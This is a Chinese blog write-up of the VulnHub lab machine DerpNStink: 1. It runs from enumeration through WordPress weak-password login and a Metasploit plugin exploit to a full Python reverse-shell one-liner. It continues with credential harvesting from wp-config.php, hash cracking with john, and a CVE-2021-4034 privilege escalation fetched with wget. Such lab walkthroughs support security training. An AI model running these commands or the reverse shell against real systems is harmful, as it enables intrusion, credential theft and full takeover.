渗透项目(七):DERPNSTINK: 1

这篇具有很好参考价值的文章主要介绍了渗透项目(七):DERPNSTINK: 1。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

靶机地址:DerpNStink: 1 ~ VulnHub

1、DerpNStink考察点:

1)信息收集:

  1. nmap收集信息
  2. curl深入枚举
  3. Hosts
  4. 页面信息枚举
  5. Wpscan枚举wordpress(或用AWVS扫描)

2)webshell:

MSF 利用Slideshow Gallery模块

3)内部信息收集:

  1. 信息枚举
  2. Mysql信息枚举
  3. John暴力破解
  4. FTP信息枚举

4)提权:

1、CVE-2021-4034

2、渗透过程

1)将靶机下载解压导入,打开kali利用nmap查看同局域网下的主机:

nmap 192.168.44.1/24 -sP        #查看44网段下存活的主机

发现目标靶机192.168.44.135

渗透项目(七):DERPNSTINK: 1

2)利用nmap对目标靶机进行更深度的信息收集

nmap 192.168.44.135 -p-        #查看其开放得端口 

渗透项目(七):DERPNSTINK: 1

发现了21、22、80端口,同时发现了report for derpnstink.local,21和22端口都可能存在爆破,80为web端服务,先查看80端口,浏览器输入地址后,发现:

渗透项目(七):DERPNSTINK: 1 页面上没什么信息,我们可以ctrl + u查看源代码,也可以在kali终端输入:

curl http://192.168.44.135        #利用curl工具去请求该网页 

渗透项目(七):DERPNSTINK: 1

请求到网页源代码,最底下出现了flag1

 flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) 

渗透项目(七):DERPNSTINK: 1

 在源代码上方,发现了一个src得路径,这里出现了路径隐私泄露

利用curl工具去访问该路径:

渗透项目(七):DERPNSTINK: 1

可以发现,它这里要求将ip和域名加入本地hosts文件后,再做一些其他的操作。

结合之前nmap靶机收集到的域名:derpnstink.local,将其写入hosts文件

渗透项目(七):DERPNSTINK: 1

 

3)对域名 derpnstink.local进行枚举,输入:

dirb http://derpnstink.local/

发现了weblog的目录:

渗透项目(七):DERPNSTINK: 1

然后再对该路径进行信息枚举:

dirb http://192.168.44.135/weblog/

渗透项目(七):DERPNSTINK: 1

发现了该路径,该路径一般存在后台管理,浏览器输入后路径,发现登录界面,浅浅的利用弱密码进行登录,发现登录成功。弱口令是admin,admin。

渗透项目(七):DERPNSTINK: 1发现这个是WordPress站点(博客站点) 

4)利用AWVS或者Wpscan扫描该站点:

wpscan --url http://derpnstink.local/weblog/

渗透项目(七):DERPNSTINK: 1

 发现版本为WordPress version 4.6.21 identified,这个slideshow-gallery是wordpress的plugin

5)打开msfconsole,search Sildehow Gallery,看是否有可利用的模块

渗透项目(七):DERPNSTINK: 1

然后按照要求填入必须的参数:

set rhosts 192.168.44.135

set wp_user admin
set wp_password admin

set targeturi /weblog

run

然后返回一个连接,输入shell,获得一个暂时shell,这里可以查看下是否按照python,如果安装了,可以利用python执行一句话,获取一个稳定的shell,然后在kali终端开启监听:

渗透项目(七):DERPNSTINK: 1

在msfconsole里输入: 

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.44.128",6677));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

监听到后再输入:python -c 'import pty; pty.spawn("/bin/bash")'

渗透项目(七):DERPNSTINK: 1

查看到它上面的路径,逐层返回后看到了wp的配置文件,输入命令查看是否存在用户名和密码:

grep "root" -rn wp-config.php

发现26:define('DB_USER', 'root');

26行存在数据库用户root,然后发现28行的数据库密码是mysql 

渗透项目(七):DERPNSTINK: 1

 6)下面登录mysql数据库:查看数据库里信息

渗透项目(七):DERPNSTINK: 1

发现了wp_users

查询表内数据:select * from wp_users;

渗透项目(七):DERPNSTINK: 1 发现了两个用户和他们的密码。将unclestinky用户的密码复制到2.txt,利用john去爆破密码:

渗透项目(七):DERPNSTINK: 1 

渗透项目(七):DERPNSTINK: 1 爆破出密码是wedgie57 

7)利用爆破出来的密码和数据库里的用户,登录后台

渗透项目(七):DERPNSTINK: 1

发现flag2

flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

8)经过之前的信息收集可以发现存在一个用户:stinky,利用爆破的密码登录ftp,枚举一些ftp中的信息。

渗透项目(七):DERPNSTINK: 1

这边一路table键,遍历到一个key.txt文件,将其下载到kali本地。这个是ssh的密匙,利用该密匙输入:

ssh -i key.txt stinky@192.168.44.135

渗透项目(七):DERPNSTINK: 1

 登陆成功。搜寻一下,查看是否有flag3

渗透项目(七):DERPNSTINK: 1

发现flag3:

 flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)

9)下面进行提权,提权方式有很多,这里可以借机复现一下CVE-2021-4034,因为观察到ubuntu版本是14.04,可能存在此漏洞。

在kali开启服务:

python -m http.server 8082

然后从github上粘贴下cve-2021-4034-poc.c文件,我这里直接将漏洞利用代码粘贴下来了,然后在反弹的shell中,进入tmp目录,从kali的web端wget下来cve-2021-4034-poc.c,将其gcc编译输出。然后复权运行,即可提权成功。

渗透项目(七):DERPNSTINK: 1

flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)

这里的CVE-2021-4034的原理会在后续的文章中叙述。

提权的方式还有很多,这个靶机的可玩性也比较多,比如数据库的密码破解可以利用hashcat等等工具,其中还有一些其他的信息可以挖掘使用。

本次的渗透项目就到此结束了,学到了一些新的知识,复现了一个CVE漏洞~文章来源地址https://www.toymoban.com/news/detail-489645.html

到了这里,关于渗透项目(七):DERPNSTINK: 1的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Vulnhub靶机渗透学习——DC-9

    本文仅个人学习所做笔记,仅供参考,有不足之处请指出! vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC9 还是老样子只有拿到root权限才可以发现

    2024年02月09日
    浏览(46)
  • [VulnHub靶机渗透] pWnOS 2.0

    目录 一、前言 二、外围打点——信息收集 1、主机探测 2、端口扫描 3、漏洞扫描 三、信息收集+渗透测试 1、web渗透测试 2、利用sqlmap上传木马,拿www-data权限 3、Simple PHP 框架漏洞利用,拿www-data权限 四、提权 1、常规提权操作+信息收集 3、crackmapexec密码碰撞 4、root权限 靶机

    2024年04月10日
    浏览(39)
  • [渗透测试学习靶机07] vulnhub靶场 Prime 2

    Kali的IP地址:192.168.127.139 靶机的IP地址:192.168.127.145 目录 一、信息搜集 二、漏洞挖掘 三、漏洞利用 四、提权 总结: Prime 2这个靶机我看网上很少有人通关打靶练习,自己尝试做了一下,感觉整体难度:比较难,大家可以参考一下。 1.1、扫描主机IP 1.2、扫描端口 发现开放了

    2024年02月05日
    浏览(48)
  • [VulnHub靶机渗透]:billu_b0x 快速通关

    目录 前言: 访问80端口的web页面 1.扫描目录

    2024年01月21日
    浏览(42)
  • Vulnhub靶机渗透之新手入门 JIS-CTF入门靶场-学习笔记

    目录 学习前言 准备工作 一、寻找目标主机(信息收集) 二、敏感文件 三、Getshell上传木马 用蚁剑进行Getshell 四、寻找Linux密码进行ssh连接 五、连接SSH最后一步 六、总结 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去

    2024年02月14日
    浏览(41)
  • 看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

    vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 这是一个漏洞靶机,老样子需要找到flag即可。 官方下载:https://download.vulnhub.com/myfileserver/My_file_server_2.o

    2023年04月19日
    浏览(49)
  • vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势)

    信息收集就略了,nmap就可以了,没有太多知识 你会收集到 1.网页绝对路径,这里通过sql注入上传文件或者通过sqlmap获取–os-shell会用到 2.http://靶场ip/se3reTdir777/index.php# 这是一个sql注入页面 先测试有无SQL注入漏洞,输入SQL注入测试神技  \\\' 进行测试 提示我们存在SQL语句错误,表

    2024年01月21日
    浏览(46)
  • 实训渗透靶场02|3星vh-lll靶机|vulnhub靶场Node1

    写在前面: 此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除) netdiscover扫描目的IP 发现开放端口为22和3000 访问3000 3000端口是node 对node.js稍有了解的都知道 3000是node.js的默认端口,简

    2024年02月13日
    浏览(36)
  • 【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)

    Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权) 靶场地址 提取码:rong 🔥系列专栏:Vulnhub百个项目渗透 🎉欢迎关注🔎点赞👍收藏⭐️留言📝 📆首发时间:🌴2022年8月30日🌴 🍭作者水平很有限,如果发现错误,还望告知,感谢! ` 本文章仅用作实验学习,

    2024年02月06日
    浏览(44)
  • 【甄选靶场】Vulnhub百个项目渗透——项目五十六:sp-jerome(squid代理,计划任务)

    Vulnhub百个项目渗透——项目五十六:sp-jerome(文件上传,缓冲区溢出) 🔥系列专栏:Vulnhub百个项目渗透 🎉欢迎关注🔎点赞👍收藏⭐️留言📝 📆首发时间:🌴2023年1月20日🌴 🍭作者水平很有限,如果发现错误,还望告知,感谢! 本文章仅用作实验学习,实验环境均为

    2024年02月01日
    浏览(49)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包